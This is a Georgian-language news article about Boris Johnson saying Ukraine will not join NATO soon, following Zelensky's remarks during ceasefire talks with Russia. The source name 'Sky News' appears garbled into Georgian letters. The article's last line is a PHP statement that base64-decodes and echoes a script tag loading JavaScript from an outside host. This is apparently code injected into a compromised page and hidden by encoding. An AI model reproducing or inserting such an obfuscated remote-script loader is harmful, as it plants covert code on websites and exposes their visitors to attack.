celsiusi
ავერსი შნაიდერი
ყველა ყოველთვის ამბობდა და ჩვენ პუტინს ნათლად ვუთხარით, რომ უკრაინა, უახლოეს მომავალში, არავითარ შემთხვევაში ნატოს არ შეუერთდება,- ამის შესახებ დიდი ბრიტანეთის პრემიერ-მინისტრმა ბორის ჯონსონმა უკრაინის პრეზიდენტის მიერ გუშინ გაკეთებულ კომენტართან დაკავშირებით განაცხადა, რა დროსაც ვოლოდიმირ ზელენსკიმ აღნიშნა, რომ უკრაინას შეუძლია უარი თქვას ნატოს სამხედრო ალიანსში გაწევრიანების მცდელობაზე.
 
შკყ Nეწს-ის ინფორმაციით, ბორის ჯონსონმა ასევე აღნიშნა, რომ ვოლოდიმირ ზელენსკის ესმის.
 
„გუშინ კვლავ ველაპარაკე ვოლოდიმირ ზელენსკის და რა თქმა უნდა მესმის, რას ამბობს ის ნატოზე და ამ დროისთვის არსებულ პოზიციაზე”, - დასძინა ბრიტანეთის პრემიერმა.
 
შეგახსენებთ, უკრაინა ამჟამად რუსეთთან ცეცხლის შეწყვეტისა და ჯარების გაყვანის შესახებ მოლაპარაკებებს აწარმოებს. ზელენსკიმ წუხელ განაცხადა, რომ მოლაპარაკებების პოზიციები ახლა "უფრო რეალისტურად გამოიყურება".
 
„უკრაინა წლების განმავლობაში იბრძოდა ნატოში გაწევრიანებისთვის, თუმცა მსგავსი ნაბიჯი რუსეთის გაღიზიანებას გამოიწვევდა, რომელსაც საკუთარ საზღვრებთან ნატოს კიდევ ერთი წევრი ქვეყნის დანახვა არ სურს“, - წერს შკყ Nეწს.
928
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");